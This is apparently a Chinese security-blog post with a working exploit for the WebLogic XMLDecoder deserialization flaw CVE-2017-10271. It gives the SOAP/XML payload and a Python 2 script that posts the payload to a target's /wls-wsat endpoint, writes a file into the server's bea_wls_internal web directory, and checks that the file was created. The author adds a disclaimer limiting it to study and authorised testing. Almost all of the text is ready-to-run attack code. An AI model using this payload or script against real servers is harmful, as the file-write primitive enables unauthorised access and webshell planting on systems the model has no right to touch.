向 /wls-wsat/CoordinatorPortTyp
POST提交如下XML并将 Content-Type
修改为 test/xml
。
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.txt</string><void method="println"><string>weblogic_CVE-2017-10271</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
提交过后会在 /bea_wls_internal/
下生成test.txt。
#coding=utf-8
import requests
import sys
#author 香香@chamd5
#声明:仅用于学习交流与授权测试,请勿用于非法用途,其后果与本人及团队无关
def exp(url,file):
headers = {'Content-type': 'text/xml'}
xml = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/%s</string><void method="println"><string>CVE-2017-10271_test</string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope> '''%(file)
res = requests.post('http://%s/wls-wsat/CoordinatorPortType'%(url), headers=headers, data=xml)
if res.status_code != 404:
res = requests.head('http://%s/bea_wls_internal/%s'%(url,file)).status_code
if res != 404:
print 'ok! file_path: http://%s/bea_wls_internal/%s'%(str(url),str(file))
else:
print 'no!'
if __name__ == '__main__':
if len(sys.argv)<3:
print '''
please use python weblogic.py host:port filepath
'''
sys.exit(0)
url = sys.argv[1]
file = sys.argv[2]
exp(url,file)
参考链接:
https://github.com/kylingit/blog-hugo/blob/master/content/blog/Weblogic-0day.md